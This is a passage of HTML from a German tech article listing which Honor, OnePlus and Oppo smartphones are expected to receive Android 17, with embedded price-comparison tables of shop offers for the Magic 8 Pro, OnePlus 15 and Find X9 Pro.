<li><a href="https://www.pcwelt.de/article/2795141/honor-400-smartphone-test.html" target="_blank" rel="noreferrer noopener">400</a> / <a href="https://www.pcwelt.de/article/2801931/honor-400-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>200 / <a href="https://www.pcwelt.de/article/2379154/honor-200-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro </a>/ Lite / Smart</li>



<li>Magic 6 / <a href="https://www.pcwelt.de/article/2286476/das-honor-magic-6-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Magic 7 / Pro / <a href="https://www.pcwelt.de/article/2602028/honor-magic-7-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V Flip</li>
</ul>



<p><strong>Voraussichtlich kein Android 17: </strong>Magic 5, Magic 5 Pro, Magic V2, Magic V3, Magic VS, X50 Pro, X60 Pro, Honor 90, Honor 90 Lite.</p>



<p><strong>Honor Magic 8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>911,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="911,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 911,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>968,72 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vendor-api="shopping24" data-vars-product-price="968,72 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 968,72 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>968,72 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=PrlZ0vl_j-MgFdiMIpCMzNcfXAAw-fo8ajxrg2oU1zfARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260622&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=PrlZ0vl_j-MgFdiMIpCMzNcfXAAw-fo8ajxrg2oU1zfARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="968,72 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 968,72 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>969,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=A1X9m0gdxumf7aDQSDOyE7CKaG8FITs4FdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_G7OfJuvmdYJVPoqacKphKIai9bm1G-GO_9b1SEqOQXKJohhjmWN-a6-8R6lrAC6sfmW34S_ZA8J&amp;mid=686422767571&amp;id=686422767571&amp;ts=20260622&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=A1X9m0gdxumf7aDQSDOyE7CKaG8FITs4FdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_G7OfJuvmdYJVPoqacKphKIai9bm1G-GO_9b1SEqOQXKJohhjmWN-a6-8R6lrAC6sfmW34S_ZA8J&amp;mid=686422767571&amp;id=686422767571&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="969,90 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 969,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260622&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/honor-logo.svg" alt="Honor" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-price="1.299,90 €" data-vars-product-vendor="Honor" aria-label="Deal anschauen bei Honor für 1.299,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">OnePlus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f0193ce"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/OnePlus-15T-green.jpg?quality=50&amp;strip=all&amp;w=1200" alt="OnePlus 15T green" class="wp-image-3084428" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnePlus</p></div>



<p>Der chinesische Hersteller OnePlus gibt für die meisten seiner Geräte recht eindeutige Update-Versprechen. Ältere Modelle fallen dennoch aus dem Update-Zyklus.</p>



<p>Diese Oneplus-Smartphones sollten auch Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">OnePlus 15</a></li>



<li><a href="https://www.pcwelt.de/article/3033893/oneplus-15r-test.html" target="_blank" rel="noreferrer noopener">OnePlus 15R</a></li>



<li><a href="https://www.pcwelt.de/article/2582777/oneplus-13-test-smartphone-unter-1000-euro.html" target="_blank" rel="noreferrer noopener">OnePlus 13</a></li>



<li><a href="https://www.pcwelt.de/article/2581125/oneplus-13r-im-test-grossartiger-allrounder-mit-toller-leistung.html" target="_blank" rel="noreferrer noopener">OnePlus 13R</a></li>



<li><a href="https://www.pcwelt.de/article/2218966/oneplus-12-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12</a></li>



<li><a href="https://www.pcwelt.de/article/2231965/oneplus-12r-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12R</a></li>



<li><a href="https://www.pcwelt.de/article/1812962/oneplus-11-test-smartphone.html" target="_blank" rel="noreferrer noopener">Oneplus 11 5G</a></li>



<li>Oneplus Open</li>



<li><a href="https://www.pcwelt.de/article/2852837/oneplus-nord-ce-5-test.html" target="_blank" rel="noreferrer noopener">OnePlus Nord CE5</a></li>



<li><a href="https://www.pcwelt.de/article/2847544/oneplus-nord-5-test-2.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 5</a></li>



<li>Oneplus Nord CE4</li>



<li><a href="https://www.pcwelt.de/article/2420699/oneplus-nord-4-test.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 4</a></li>
</ul>



<p><br><strong>Voraussichtlich kein Android 17:</strong> OnePlus 10 Pro, 10T, 10R, Nord 3 5G, Nord CE 3 Lite 5G, Nord CE4 Lite 5G.</p>



<p><strong>OnePlus 15 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>785,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260622&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="785,99 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 785,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260622&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>803,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Jxmde9vm4X2vsU1Wdh-mdc5Hd99OQeF7W5f-Ushe6YPEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260622&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Jxmde9vm4X2vsU1Wdh-mdc5Hd99OQeF7W5f-Ushe6YPEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="803,90 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 803,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>849,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260622&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="849,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 849,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/oneplus-logo.svg" alt="OnePlus" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-price="949,00 €" data-vars-product-vendor="OnePlus" aria-label="Deal anschauen bei OnePlus für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Oppo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f025e85"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260222_112411266.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Oppo Find X9 Pro" class="wp-image-3067642" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Bei Oppo stehen die Chancen für die meisten, neueren Smartphones ebenfalls gut, das Update auf Android 17 zu erhalten. Ältere Reno- oder Find-Modelle fallen aber schon bald aus dem Support heraus und sind daher nicht mehr dabei.</p>



<p>Diese Oppo-Smartphones bekommen voraussichtlich Android 17:</p>



<ul class="wp-block-list">
<li>Find N6</li>



<li><a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">Find X9</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2875375/oppo-a5-5g-test.html" target="_blank" rel="noreferrer noopener">A5 5G</a> / <a href="https://www.pcwelt.de/article/2874342/oppo-a5-pro-5g-test.html" target="_blank" rel="noreferrer noopener">5G Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2882216/oppo-a40-test.html" target="_blank" rel="noreferrer noopener">A40</a></li>



<li>Reno 15 / Pro</li>



<li>Reno 14 / Pro</li>



<li>Reno 13 / Pro / F / FS</li>



<li>Find X8 /<a href="https://www.pcwelt.de/article/2546364/oppo-find-x8-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a> / Ultra</li>



<li>Find X7 / Ultra</li>



<li>Find N5 </li>
</ul>



<p><strong>Wahrscheinlich kein Android 17:</strong> Find X6, Find X6 Pro, Find X5, Find X5 Lite, Find X5 Pro, Find N2, Find N2 Flip, Reno 12, Reno 12 Pro, Reno 12 F, Reno 12 FS, Reno 11, Reno 11 Pro, Reno 11 F, Reno 11 FS.</p>



<p><strong>Oppo Find X9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.149,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260622&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.149,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.149,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Galaxus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
